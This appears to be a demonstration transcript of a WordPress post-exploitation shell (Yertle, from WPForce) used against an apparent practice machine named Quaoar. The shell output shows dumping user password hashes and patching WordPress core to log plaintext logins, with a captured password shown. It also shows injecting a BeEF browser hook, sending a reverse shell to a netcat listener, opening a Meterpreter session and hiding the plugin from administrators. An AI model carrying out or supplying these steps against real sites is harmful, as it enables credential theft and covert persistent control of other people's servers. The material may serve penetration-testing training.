- A+
os-shell> help Core Commands ============= Command Description ------- ----------- ? Help menu beef Injects a BeEF hook into website exit Terminate the session hashdump Dumps all WordPress password hashes help Help menu keylogger Patches WordPress core to log plaintext credentials keylog Displays keylog file meterpreter Executes a PHP meterpreter stager to connect to metasploit quit Terminate the session shell Sends a TCP reverse shell to a netcat listener stealth Hides Yertle from the plugins page
os-shell> hashdump ID: 1 - Username: admin Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1 Email: Quaoar@localhost.com ID: 2 - Username: wpuser Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S. Email: wpuser@localhost.com ID: 3 - Username: n00py Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/. Email: n00py@protonmail.com os-shell>
os-shell> keylogger This module modifies files within the WordPress core. Would you like to continue? (Y/n) Y wp_signon function patched. Do not run this more than once. Use 'keylog' to check the log file. os-shell>
os-shell> keylog 2017-03-30 - Username: && Password: 2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword
os-shell> beef This module modifies files within the WordPress core. Would you like to continue? (Y/n) Y IP Address: BeEF hook added! Check BeEF for any hooked clients. Do not run this multiple times.
os-shell> shell IP Address: Port: 8080 Sending reverse shell to port 8080 os-shell>
root@Kali:~/WPForce$ nc -l 8080 bash: no job control in this shell www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$
os-shell> meterpreter IP Address: Port: 4444 Sending meterpreter stager to connect back to os-shell>
[*] Started reverse handler on [*] Starting the payload handler... [*] Sending stage (33068 bytes) to [*] Meterpreter session 1 opened ( -> at 2017-03-29 20:49:16 -0600
os-shell> stealth
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